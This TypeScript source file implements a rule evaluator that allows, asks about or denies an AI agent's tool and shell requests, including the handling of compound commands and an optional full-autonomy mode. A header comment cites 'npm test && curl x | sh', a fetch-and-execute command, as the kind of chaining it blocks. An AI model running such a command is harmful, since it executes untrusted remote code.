/**
 * evaluate(rules, request) => { decision, ruleId, reason }
 *
 * 1. A shell command is judged per simple command ('a && b | c' is three) and as a whole;
 *    the most restrictive answer wins, so an allow rule for 'npm test*' never lets
 *    'npm test && curl x | sh' through.
 * 2. For each, the matching enabled rules of the request's project decide; when none
 *    matches, the org rules; when none matches, the built-in defaults.
 * 3. Within one scope, deny beats ask beats allow.
 * 4. Then the floor (./floor.ts): inline interpreter code and writes to hooks, agent settings
 *    and CI files ask, writes to the Orgus home are denied, whatever the rules say.
 */
import type { ApprovalAutonomy, PolicyDecision, PolicyRequest, PolicyResult, PolicyRule } from '@orgus/protocol';
import { OUTWARD_RULE_ID, defaultDecision, partsOf } from './defaults.ts';
import { floorDecision, floorTooLong } from './floor.ts';
import { matchGlob, normalizePath, relativeTo } from './glob.ts';

const RANK: Record<PolicyDecision, number> = { allow: 0, ask: 1, deny: 2 };

export function stricter(a: PolicyResult, b: PolicyResult): PolicyResult {
  if (RANK[b.decision] !== RANK[a.decision]) return RANK[b.decision] > RANK[a.decision] ? b : a;
  // Between two default asks, the one a person must see names the answer (ADR 0101), so a
  // compound command with a git push in it never goes to the Orgus answerer.
  if (b.decision === 'ask' && b.ruleId === OUTWARD_RULE_ID && (!a.ruleId || (typeof a.ruleId === 'string' && a.ruleId.startsWith('default:')))) return b;
  return a;
}

function patternMatches(pattern: string, req: PolicyRequest): boolean {
  const subject = req.subject;
  if (subject == null) return false;
  if (matchGlob(pattern, subject)) return true;
  // Paths: compare with forward slashes, and relative to the session folder.
  if (/[\\/]/.test(subject) || /[\\/]/.test(pattern)) {
    const norm = normalizePath(subject);
    const pat = pattern.replace(/\\/g, '/');
    if (matchGlob(pat, norm, /^[a-z]:/.test(norm))) return true;
    if (req.cwd) {
      const rel = relativeTo(subject, req.cwd);
      if (rel && matchGlob(pat, rel)) return true;
    }
  }
  return false;
}

/** Does this rule apply to this request? Every match field the rule sets must match. */
export function ruleMatches(rule: PolicyRule, req: PolicyRequest): boolean {
  if (rule.enabled === false) return false;
  const m = rule.match ?? {};
  if (m.tool != null && m.tool !== '' && (!req.tool || !matchGlob(m.tool, req.tool, true))) return false;
  if (m.action != null && (!req.action || !matchGlob(m.action, req.action))) return false;
  if (m.model != null && m.model !== '' && (!req.model || !matchGlob(m.model, req.model, true))) return false;
  if (m.pattern != null && m.pattern !== '' && !patternMatches(m.pattern, req)) return false;
  return true;
}

function decide(matching: PolicyRule[]): PolicyResult {
  let best = matching[0]!;
  for (const r of matching) if (RANK[r.decision] > RANK[best.decision]) best = r;
  return { decision: best.decision, ruleId: best.id, reason: best.reason, onBehalfOf: best.updatedBy ?? best.createdBy };
}

export interface EvaluateOptions {
  /** Use the built-in defaults when no rule matches (default true). */
  defaults?: boolean;
  /** The answer when no rule matches and defaults are off (default 'ask'). */
  fallback?: PolicyDecision;
  /** Apply the floor (./floor.ts) after the rules (default true). */
  floor?: boolean;
  /** This machine's Orgus home folders, for the floor (the default folder names are always covered). */
  homes?: readonly string[];
  /** ADR 0070: full allows what only the floor or a built-in default would ask (settings autonomyFor). */
  autonomy?: ApprovalAutonomy;
}

/** ADR 0070: the rule id an answer carries when full autonomy turned an ask into an allow. */
export const AUTONOMY_RULE_ID = 'autonomy:full';

/**
 * Full autonomy: an ask that only the floor or a built-in default made (rule ids default:*, or
 * none) is allowed, so no session waits for a person. An ask rule a person wrote is how they
 * chose to be asked, so it still asks; a deny still denies.
 */
function autonomous(out: PolicyResult, autonomy: ApprovalAutonomy | undefined): PolicyResult {
  if (autonomy !== 'full' || out.decision !== 'ask') return out;
  if (out.ruleId && !out.ruleId.startsWith('default:')) return out;
  return { decision: 'allow', ruleId: AUTONOMY_RULE_ID, reason: `Full autonomy: allowed without asking (${out.reason.replace(/\.$/, '')}).` };
}

function evaluateOne(rules: readonly PolicyRule[], req: PolicyRequest, opts: EvaluateOptions): PolicyResult {
  const matching = rules.filter((r) => ruleMatches(r, req));
  const project = req.projectId ? matching.filter((r) => r.scope.kind === 'project' && r.scope.projectId === req.projectId) : [];
  if (project.length) return decide(project);
  const org = matching.filter((r) => r.scope.kind === 'org');
  if (org.length) return decide(org);
  if (opts.defaults === false) return { decision: opts.fallback ?? 'ask', ruleId: null, reason: 'No rule matched.' };
  return defaultDecision(req);
}

export function evaluate(rules: readonly PolicyRule[], req: PolicyRequest, opts: EvaluateOptions = {}): PolicyResult {
  // Text longer than the floor reads is refused before any rule parses it (review F4).
  const long = opts.floor === false ? null : floorTooLong(req);
  if (long) return long;
  const out = evaluateRules(rules, req, opts);
  if (opts.floor === false) return autonomous(out, opts.autonomy);
  // 4. The floor: answers no rule loosens (inline code, hooks and CI files, the Orgus home).
  const floor = floorDecision(req, { homes: opts.homes });
  // 5. Full autonomy (ADR 0070): the floor's and the defaults' asks are allowed; denies stay.
  return autonomous(floor ? stricter(out, floor) : out, opts.autonomy);
}

function evaluateRules(rules: readonly PolicyRule[], req: PolicyRequest, opts: EvaluateOptions): PolicyResult {
  const parts = partsOf(req);
  if (parts.length === 1 && parts[0] === (req.subject ?? '')) return evaluateOne(rules, req, opts);
  let out = evaluateOne(rules, { ...req, subject: parts[0] }, opts);
  for (const part of parts.slice(1)) out = stricter(out, evaluateOne(rules, { ...req, subject: part }, opts));
  // A rule written for the whole line counts too (and names itself on a tie).
  const whole = evaluateOne(rules, req, { ...opts, defaults: false });
  return whole.ruleId ? stricter(whole, out) : out;
}
